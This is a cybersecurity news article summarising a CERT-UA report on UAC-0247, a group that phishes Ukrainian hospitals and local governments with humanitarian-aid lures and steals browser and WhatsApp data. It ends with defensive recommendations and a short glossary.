Phantom Aid: How UAC-0247 Hijacks Hospitals and Governments in a Covert Data Heist

It began with an email - a plea for humanitarian partnership, seemingly from a reputable nonprofit. But behind the promise of aid lurked a digital predator: UAC-0247, a threat actor engineering one of the most audacious cyber-espionage campaigns to hit Ukrainian hospitals and government agencies in recent memory. As municipal networks scrambled to respond, evidence mounted: this was no ordinary phishing attempt, but a calculated assault, blending social engineering, AI-generated deception, and stealthy malware to siphon sensitive data from the heart of Ukraine’s public sector.

Fast Facts

• UAC-0247 targets hospitals and local governments with tailored phishing lures referencing humanitarian aid.
• Attackers deploy custom malware to steal browser credentials and WhatsApp data, using tools like CHROMELEVATOR and ZAPIXDESK.
• Malicious payloads are delivered via shortcut (.LNK) files, HTA scripts, and scheduled tasks, evading routine detection.
• Campaign includes advanced persistence, encrypted reverse shells, and lateral movement using public tools and covert tunnels.
• CERT-UA warns of ongoing attacks and recommends restricting script execution and monitoring for suspicious activity.

A Humanitarian Ruse with Technical Precision

The attack chain begins in inboxes: messages crafted to appear as urgent humanitarian proposals, often accompanied by links to convincing AI-generated nonprofit websites or legitimate sites compromised through cross-site scripting (XSS). With a single click, victims unwittingly download an archive containing a shortcut file (LNK). The moment this file is opened, it triggers a sequence that leverages Windows utilities like mshta.exe to execute hidden scripts.

These scripts download further payloads, quietly establishing a foothold on the target system. A decoy form may flash on screen, but in the background, a custom two-stage loader unpacks a heavily encrypted reverse shell known as RAVENSHELL. Communication with the attackers is encrypted and covert, allowing for remote command execution, file theft, and system control.

The final stage deploys AGINGFLY - a remote administration tool with dynamic command modules, capable of keylogging, screenshot capture, and arbitrary code execution. Attackers maintain persistence via PowerShell scripts like SILENTLOOP, which cleverly use Telegram channels for backup command-and-control if primary infrastructure is blocked.

Browser and WhatsApp Data in the Crosshairs

UAC-0247’s endgame is data theft. Their toolkit includes CHROMELEVATOR, which extracts passwords and cookies from Chromium-based browsers, and ZAPIXDESK, specialized in decrypting desktop WhatsApp databases. These tools enable the theft of sensitive credentials and private communications - potentially devastating for hospitals handling patient data or government agencies managing critical infrastructure.

The attackers don’t stop there. Reconnaissance unfolds with subnet scanners like RUSTSCAN, while stealthy network tunnels are built using LIGOLO-NG and CHISEL. In some cases, the group even deployed cryptocurrency miners disguised within legitimate VPN applications, turning compromised hosts into covert profit engines.

Defending Against a Persistent Threat

CERT-UA’s investigation underscores the urgency of robust cyber hygiene: restrict execution of risky file types (LNK, HTA, JS), limit the use of scripting utilities, and monitor for suspicious network connections and abnormal process activity. In the face of UAC-0247’s evolving tactics, proactive defense and continuous monitoring are the best shields against a campaign that shows no sign of stopping.

As cybercriminals like UAC-0247 weaponize humanitarian crises for digital plunder, Ukraine’s institutions face a sobering reality: even the promise of aid can be a wolf in sheep’s clothing.

WIKICROOK

• Phishing: Phishing is a cybercrime where attackers send fake messages to trick users into revealing sensitive data or clicking malicious links.
• Reverse Shell: A reverse shell is when a hacked computer secretly connects back to an attacker, giving them remote control and bypassing standard security defenses.
• Lateral Movement: Lateral movement is when attackers, after breaching a network, move sideways to access more systems or sensitive data, expanding their control and reach.
• Cross: Cross-Site Scripting (XSS) is a cyberattack where hackers inject malicious code into websites to steal user data or hijack sessions.
• DLL Side: DLL Side is a technique where attackers trick programs into loading malicious DLL files, bypassing security and gaining unauthorized access or control.